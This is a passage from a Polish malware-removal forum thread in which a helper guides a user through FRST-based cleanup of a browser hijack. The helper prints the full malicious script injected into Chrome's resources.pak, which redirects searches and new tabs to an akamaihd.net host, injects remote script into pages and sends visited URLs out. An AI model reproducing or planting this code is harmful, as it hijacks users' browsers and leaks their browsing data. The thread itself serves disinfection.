fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). zaprezentuj wynikowy fixlog.txt.

Większość zadań wykonana, ale w przeglądarce Google Chrome ostały się przekierowania Ask: CHR HomePage: Default -> hxxp://www.search.ask.com/?gct=hp CHR DefaultSearchURL: Default -> hxxp://www.search.ask.com/web?q={searchTerms} CHR DefaultSearchKeyword: Default -> search.ask.com CHR DefaultSuggestURL: Default -> hxxp://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms} Czy na pewno wykonałeś reset przeglądarki? I na wszelki wypadek podaj nowe raporty FRST, gdyż widziana sytuacja mogła się zmienić.

To nie wygląda na oryginalny raport AdwCleaner, tylko ponownie zapisany, gdyż przejścia do nowej linii są zniekształcone. Niemniej log nie wskazuje, by narzędzie coś wykryło. Upłynęło dużo czasu, w międzyczasie wydano też nowe wersje Google Chrome. Czy problemy z zamulaniem przeglądarki nadal mają miejsce?

Pro forma komentarz. Tak, problemem była modyfikacja pliku zasobów Google Chrome C:\Program Files\Google\Chrome\Application\[Wersja]\resources.pak. Oto zmodyfikowany frament (dostawiony szkodliwy skrypt): <!-- Copyright 2013 The Chromium Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. We use an HTML page just to have access to the DOM, for URL parsing. An alternative would be to include a URL parsing JavaScript library with the extension but this approach is likely smaller and faster. --> <html> <head> <script src="thunk.js"></script> </head> <body> </body> </html> try{(function(d,u){function k(a){for(var b=0;b<a.length;b++){var e=b,c;c=a[b];if("string"===typeof c)a:{if(!v(c))for(var g=0;g<p.length;g++)if(p[g].test(c)){c="";break a}}else c=c.toString();c=encodeURIComponent(c.replace(w,"$cma;"));a[e]=c}(new Image).src="https://moneyviking-a.akamaihd.net/stats/?"+a.shift()+"="+a.join("|,|")}function m(a){return [ ".*capacostarica.com.*",".*volunteercentre.org.*",".*search.yahoo.com.*ddc[_-]bd.*",".*capn=ed_ui_.*_kw_001.*",".*ask.com.*siteid=28527.*",".*src=55cd729e57e760c05c8b466e.*",".*capn=ed_ui_jp_kw_002.*",".*thesmartsearch.net.*",".*search.yahoo.com.*rh=true.*",".*search.results-hub.com.*",".*search.netbetterresults.com.*"," .*search.yahoo.com.*ddc[_-]bd.*",".*fluey.com.*",".*tapxchange.com.*",".*search.yahoo.com.*",".*ask\\.com.*",".*search.searchitknow.com.*",".*ask.com.*siteid=23199.*",".*ask.com.*siteid=23203.*",".*ask.com.*siteid=23209.*",".*ask.com.*siteid=23204.*",".*ask.com.*siteid=23210.*",".*ask.com.*siteid=28524.*",".*ask.com.*siteid=23200.*",".*ask.com.*siteid=28525.*",".*ask.com.*siteid=28531.*",".*ask.com.*siteid=23205.*",".*ask.com.*siteid=28532.*",".*ask.com.*siteid=29358.*",".*ask.com.*siteid=23211.*",".*ask.com.*siteid=28533.*",".*ask.com.*siteid=28526.*",".*ask.com.*siteid=23201.*",".*ask.com.*siteid=23207.*",".*ask.com.*siteid=23212.*",".*ask.com.*siteid=28529.*",".*ask.com.*siteid=29356.*",".*ask.com.*siteid=23202.*",".*ask.com.*siteid=23208.*",".*ask.com.*siteid=23213.*",".*ask.com.*siteid=28530.*",".*smartshopsave.com.*siteid=29357.*",".*bing.com.*IMZ-RZ.*",".*home.searchpile.com.*",".*au.smartshopsave.com.*28527.*",".*uk.ask.com.*32859.*",".*thesmartsearch.net.*p=ein.*",".*search.yahoo.com.*yhs-invalid.*",".*capn=ed_ui_.*_kw_004.*",".*au.ask.com.*28527.*",".*search.top-arama.com.*",".*search.yahoo.com.*spigot.*",".*search.yahoo.com.*greentree.*",".*smartshopsave.com.*siteid=23203.*",".*smartshopsave.com.*siteid=23199.*",".*smartshopsave.com.*siteid=23204.*",".*smartshopsave.com.*siteid=23209.*",".*smartshopsave.com.*siteid=23210.*",".*smartshopsave.com.*siteid=28524.*",".*smartshopsave.com.*siteid=23200.*",".*smartshopsave.com.*siteid=28525.*",".*smartshopsave.com.*siteid=28531.*",".*smartshopsave.com.*siteid=23205.*",".*smartshopsave.com.*siteid=28532.*",".*smartshopsave.com.*siteid=29358.*",".*smartshopsave.com.*siteid=23211.*",".*smartshopsave.com.*siteid=28533.*",".*smartshopsave.com.*siteid=28526.*",".*smartshopsave.com.*siteid=23201.*",".*smartshopsave.com.*siteid=23207.*",".*smartshopsave.com.*siteid=23212.*",".*smartshopsave.com.*siteid=28529.*",".*smartshopsave.com.*siteid=29356.*",".*smartshopsave.com.*siteid=23202.*",".*smartshopsave.com.*siteid=23208.*",".*smartshopsave.com.*siteid=23213.*",".*smartshopsave.com.*siteid=28530.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/s.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/h.*",".*search.yahoo.com.*_bd_com.*",".*=__default.*"].some(function({return(new RegExp().test(a)})}function x(a,{var e=queryCommandValue;h(function(c){c||(c={});var g=c["BL_ST_"+a+"_"+e],d=Date.now();g?3E3>d-g?b&&b(!0):(c["BL_ST_"+a+"_"+e]=d,b&&b(!1),f(c)):(c["BL_ST_"+a+"_"+e]=d,f(c),b&&b(!1))})}function h(a){chrome.storage.local.get("BLGC_STORAGE",function({a&&a(b.BLGC_STORAGE)})}function f(a){var b={};b.BLGC_STORAGE=a;chrome.storage.local.set(b,function(){})}function q(a){try{if(0==a.length)return{hostName:""};var b=u.createElement("a");0!=a.indexOf("http")&&(a="http://"+a);b.href=a;return b}catch(e){}return{hostname:a}}function y(a){a=a.toLowerCase();for(var b=0;b<n.length;b++)if(-1!=a.indexOf(n[b].host.toLowerCase()))return b;return-1}function l(a,{try{b=b.replace(/[\[]/,"\[").replace(/[\]]/,"\]");var e=(new RegExp("[\?]"+b+"=([^]*)")).exec(a);return null==e?null:e[1]}catch(c){}}function z(a,{var e=l(a,n[b].oparam);switch({case 0:case 2:case 3:case 4:return!!e;case 1:var e=l(a,"type"),c=l(a,"hsimp"),g=l(a,"fr"),d=/^http(s)?:\/\/(.{2}\.)?(malaysia\.)?(y.*\.)?search\.yahoo\./;return!!g&&-1!=g.indexOf("ddc-bd")||!!c&&-1!=c.indexOf("ddc_bd")||!!e&&-1!=e.indexOf("_bd_com")||!d.test(a)||-1!=a.indexOf("/local/")}return!1}function r(a,{var e=-1,c="",g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8MBw5AQ1FBbV9aBAFcFQxCeRQBWVsXDFYaeVoAUg8TFlYbdR9aFQQTQkcFME0FA1UWQhNNfXRXD1wId1xIKVdf&q=|search_term|",d=null,f=null;b.url&&!m(b.url)&&(f=q(b.url).hostname,h(function(h){h||(h={});if(-1!=(e=y(f))){if(h[a]&&(d=q(h[a]).hostname,(!f||f==d)&&1!=e))return;c=n[e].param;!z(b.url,e)&&(queryCommandValue=l(b.url,c))&&x(a,function(c){c?k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","SkippedSearch",b.url]):(g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8MBw5AQ1FBbV9aBAFcFQxCeRQBWVsXDFYaeVoAUg8TFlYbdR9aFQQTQkcFME0FA1UWQhNNfXRXD1wId1xIKVdf&q=|search_term|".replace("|search_term|",queryCommandValue),chrome.tabs.update(a,{url:g}),k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","Search",b.url]))})}}))}function A(a,b,e){try{chrome.tabs.executeScript(a,{code:"if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://moneyviking-a.akamaihd.net/MoneyViking/cr?t=BLGC&g=64f71bdb-fbe8-49a9-98bf-c99c836b7c85&pn=Chrome'; document.head.appendChild(scr);}"})}catch(c){}-1!=t.indexOf(b.url)&&(m(e.url)||chrome.tabs.update(a,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAMXJg4JA10TDFNBJQEVVQAQGBgaeFteTFpIGFYbcw9aVlpJFBNBNARaAktXUUEeIlVfAh8fHHhMLlxBN1AaSFtE"}),h(function(c){c||(c={});c[a]=b.url;f(c)}),d.skipNewTabMsg?d.skipNewTabMsg=!1:k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","NewTab",b.url]));d.firstRun=!1;r(a,;b.url&&h(function(c){c||(c={});c[a]=b.url;f(c)})}"undefined"==typeof d.firstRun&&(d.firstRun=!1);"undefined"==typeof d.skipNewTabMsg&&(d.skipNewTabMsg=!1);var t=["chrome://newtab/","safer://newtab/"],n=[{host:".bing.",param:"q",oparam:"qs"},{host:"search.yahoo.",param:"p",oparam:"fr"},{host:".google.",param:"q",oparam:"site"},{host:".ask.",param:"q",oparam:"qo"},{host:"search.aol.",param:"q",oparam:"s_it"},{host:"go.mail.ru",param:"q",oparam:"NA"},{host:"intent.clara-labs.",param:"q",oparam:"NA"},{host:"trovi.",param:"q",oparam:"NA"},{host:".plusnetwork.",param:"q",oparam:"NA"},{host:"isearch.bobrowser.",param:"q",oparam:"NA"},{host:"www-searching.",param:"q",oparam:"NA"},{host:".thesmartsearch.",param:"q",oparam:"NA"},{host:".search.safer.",param:"q",oparam:"NA"},{host:".cassiopessa.",param:"q",oparam:"NA"},{host:"isearch.omiga-plus.",param:"q",oparam:"NA"},{host:"searches.omiga-plus.",param:"q",oparam:"NA"},{host:"istart.webssearches.",param:"q",oparam:"NA"},{host:"search.istartsurf.",param:"q",oparam:"NA"}],p=[/(?:\d[(). -]*?){9,16}/,/[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i],w=/,/g;btoa("94df1405-b2c7-479e-98ea-4be1fc81ab76_54_10");var v=function(){var a=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i;return function({return a.test(}}();chrome.runtime.onStartup.addListener(function(){d.firstRun=!0;d.skipNewTabMsg=!0;f({})});chrome.tabs.onReplaced.addListener(function(a,{var e,c;h(function(d){d||(d={});e=d[a];c=d[b];d[a]=c;d[b]=e;f(d)})});chrome.tabs.onRemoved.addListener(function(a){h(function({b||(b={});delete b[a];f(})});chrome.tabs.onCreated.addListener(function(a){if(a.id&&!a.openerTabId)if(d.firstRun){if(m(a.url))return;chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggVdF8PUFsVQxhFIlwATA1IQAwOeQFaBxQSGAxAeAoOAw4SGQAFIk0FA1oDB0VXfVtUBlpXTwhuL1ddGG8YSlxNJw=="});k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","HomePage",a.url])}else-1==t.indexOf(a.url)||m(a.url)||(chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAMXJg4JA10TDFNBJQEVVQAQGBgaeFteTFpIGFYbcw9aVlpJFBNBNARaAktXUUEeIlVfAh8fHHhMLlxBN1AaSFtE"}),k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","NewTab",a.url]));else a.openerTabId&&h(function({b||(b={});b[a.id]=b[a.openerTabId];f(});d.firstRun=!1});chrome.webNavigation.onBeforeNavigate.addListener(function(a){0===a.frameId&&r(a.tabId,{url:a.url})});chrome.tabs.onUpdated.addListener(function(a,b,d){A(a,b,d)})})(window,document)}catch(d){};// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. Rozwiązaniem byłaby albo podmiana tego pliku starszą kopią (był w folderze niezmodyfikowany plik resources.bak), albo reinstalacja przeglądarki nadpisująca zawartość katalogu Program files. To drugie już wykonałeś. Natomiast jeśli chodzi o inne zagadnienia widoczne w raportach: 1. Odinstaluj: Anvi Smart Defender 2.5 (słaby program), Java 7 Update 65 (stara wersja), McAfee Security Scan Plus (sponsor instalacji Adobe Flash), Update for PriceFountain (adware). 2. Drobny skrypt usuwający odpadkowe wpisy. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: C:\WINDOWS\Tasks\At1.job => C:\DOCUME~1\Brim\DANEAP~1\PRICEF~1\UPDATE~1\UPDATE~1.EXE SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, mcenspc.dll Toolbar: HKU\S-1-5-21-4124746199-4171654727-105604383-1006 -> Brak nazwy - {A13C2648-91D4-4BF3-BC6D-0079707C4389} - Brak pliku HKU\S-1-5-21-4124746199-4171654727-105604383-1006\...\Run: [Polar Sync] => [X] HKLM\...\Policies\Explorer: [NoCDBurning] 0 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KernelFaultCheck DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes RemoveDirectory: C:\Program Files\Winsere RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), zaznacz pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.